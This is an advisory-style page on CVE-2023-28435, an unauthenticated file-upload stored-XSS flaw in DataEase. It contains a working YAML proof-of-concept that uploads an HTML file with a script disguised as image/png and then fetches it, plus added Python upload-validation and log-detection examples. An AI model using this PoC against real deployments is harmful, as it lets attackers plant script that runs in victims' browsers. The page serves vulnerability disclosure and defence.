The file upload interface does not check permissions, so users who are not logged in can upload any file directly to the backend; the file type is not checked either, so they can upload any type of file.
PS: after a file is uploaded, the XSS is triggered via the path /static-resource/{{ranfilename}}.html
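The two missing controls described above (no session check, no file-type check) plus the unsafe way the stored file is served back can each be closed on the server side. The following is an added illustration, not DataEase's code: a validator that rejects the request shape used in the PoC (no session, `.html` name, `image/png` declared for an HTML body, path components in the filename) and the response headers a static-resource endpoint should send so an uploaded file is never rendered as a page. `Upload`, `validate_upload`, `static_resource_headers` and the sample requests are assumptions constructed for this example.

```python
"""Added example (not DataEase code): server-side checks that would have
rejected the upload in the PoC, and safe headers for serving uploads back.
Function names, the Upload record and the sample requests are assumptions."""
from dataclasses import dataclass
from typing import Dict, Tuple

# Allow-list of upload extensions with the magic bytes each must start with
# and the only Content-Type the client may declare for it.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    "gif": (b"GIF8", "image/gif"),
}


@dataclass
class Upload:
    authenticated: bool   # did the request carry a valid session?
    filename: str         # filename from Content-Disposition
    declared_type: str    # Content-Type of the multipart part
    body: bytes           # raw file bytes


def validate_upload(u: Upload) -> Tuple[bool, str]:
    """Return (accepted, reason). Trust nothing the client says on its own;
    every claim is cross-checked against the bytes or the session."""
    if not u.authenticated:
        return False, "upload requires an authenticated session"
    # Reject anything that is not a bare file name (no path traversal).
    name = u.filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if name != u.filename or name in ("", ".", ".."):
        return False, "filename must be a bare name"
    if "." not in name:
        return False, "missing extension"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not in allow-list"
    magic, mime = ALLOWED_TYPES[ext]
    if not u.body.startswith(magic):
        return False, "file content does not match its extension"
    if u.declared_type.split(";")[0].strip().lower() != mime:
        return False, "declared Content-Type does not match the file"
    return True, "ok"


def static_resource_headers(ext: str) -> Dict[str, str]:
    """Headers to attach when an uploaded file is served to a browser.
    Unknown extensions fall back to an opaque binary type."""
    mime = ALLOWED_TYPES[ext][1] if ext in ALLOWED_TYPES else "application/octet-stream"
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",   # no sniffing into text/html
        "Content-Disposition": "attachment",   # download, never render inline
        "Content-Security-Policy": "sandbox",  # even if rendered, no script
    }


# Constructed sample requests: POC mirrors the multipart body of the PoC
# (HTML bytes declared as image/png, no session); GOOD is a real PNG header.
POC = Upload(False, "1.html", "image/png",
             b'<html><script>console.log("Hello")</script></html>')
GOOD = Upload(True, "chart.png", "image/png",
              b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)

if __name__ == "__main__":
    for u in (POC, GOOD):
        print(u.filename, validate_upload(u))
```

The order of the checks matters: the session check comes first so an anonymous client learns nothing about which extensions or content types are accepted, and the magic-byte check runs before the declared Content-Type is consulted because the declared type is entirely attacker-controlled, as the PoC's `image/png` label on an HTML body shows.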
PoC code [public]

```yaml
id: CVE-2023-28435
info:
  name: File upload interface does not do permission verification exists XSS vulnerability
  author: hbdxmz
  severity: high
  verified: true
  description: |
    The file upload interface is not checked for permissions,
    so users who are not logged in can upload any file directly to the background,
    and the file type is not checked, so they can upload any type of file
    ps:上传文件后,通过路径/static-resource/{{ranfilename}}.html触发xss
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-625h-q3g9-rffc
  created: 2023/11/30
set:
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /static/resource/upload/b1ace870-c3d6-11ed-9218-{{rboundary}}
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\";filename=\"1.html\"\r\n\
        Content-Type: image/png\r\n\r\n\
        <html><script>console.log(\"Hello\")</script></html>\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'"success":true')
  r1:
    request:
      method: GET
      path: /static-resource/b1ace870-c3d6-11ed-9218-{{rboundary}}.html
    expression: response.status == 200 && response.body.bcontains(b'console.log("Hello")')
expression: r0()&&r1()
```
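The PoC leaves a characteristic two-step trace in web-server logs: a `POST` to `/static/resource/upload/<id>` without a session, followed by a `GET` for `/static-resource/<id>.html`, where `<id>` is chosen by the client. The following detection logic is an added example, not part of the advisory or of any DataEase tooling; it runs over constructed JSON access-log lines (the `has_session` field and the line format are assumptions about what a reverse proxy has been configured to record) and correlates the two requests on the resource id.

```python
"""Added example (not DataEase code): flag unauthenticated uploads to the
static-resource upload path and any fetch of an uploaded file with a
renderable extension, correlating both on the client-chosen resource id.
Log format, field names and sample lines are constructed assumptions."""
import json
import re
from typing import Dict, List

# Paths as they appear in the PoC; the id segment is client-controlled.
UPLOAD_RE = re.compile(r"^/static/resource/upload/([A-Za-z0-9-]+)$")
# Extensions a browser would render as markup (and therefore run script).
FETCH_RE = re.compile(r"^/static-resource/([A-Za-z0-9-]+)\.(html?|svg|xml)$", re.I)


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious event, in log order."""
    uploads: Dict[str, dict] = {}   # resource id -> accepted upload event
    findings: List[Dict[str, str]] = []
    for raw in lines:
        ev = json.loads(raw)
        m = UPLOAD_RE.match(ev["path"])
        if m and ev["method"] == "POST" and ev["status"] == 200:
            uploads[m.group(1)] = ev
            if not ev["has_session"]:
                findings.append({"rule": "unauthenticated-upload",
                                 "id": m.group(1), "ip": ev["ip"]})
            continue
        m = FETCH_RE.match(ev["path"])
        if m and ev["method"] == "GET" and ev["status"] == 200:
            rid = m.group(1)
            finding = {"rule": "uploaded-markup-served", "id": rid,
                       "ip": ev["ip"], "ext": m.group(2).lower()}
            if rid in uploads:   # tie the fetch back to whoever uploaded it
                finding["uploader_ip"] = uploads[rid]["ip"]
            findings.append(finding)
    return findings


# Constructed sample log: an anonymous upload and fetch of an .html resource
# (the PoC pattern) interleaved with a legitimate, authenticated PNG upload.
SAMPLE_LOG = [
    '{"ip":"203.0.113.7","method":"POST","path":"/static/resource/upload/b1ace870-c3d6-11ed-9218-abcdefgh","status":200,"has_session":false}',
    '{"ip":"198.51.100.3","method":"POST","path":"/static/resource/upload/f3e2d1c0-aaaa-bbbb-cccc-dddddddd","status":200,"has_session":true}',
    '{"ip":"198.51.100.3","method":"GET","path":"/static-resource/f3e2d1c0-aaaa-bbbb-cccc-dddddddd.png","status":200,"has_session":true}',
    '{"ip":"192.0.2.55","method":"GET","path":"/static-resource/b1ace870-c3d6-11ed-9218-abcdefgh.html","status":200,"has_session":false}',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

Either rule on its own is a useful alert; the correlation is what turns "someone uploaded without a session" and "someone fetched a stored `.html`" into a single incident with both the uploader's and the viewer's addresses, which is what an analyst needs when the upload and the click come from different hosts.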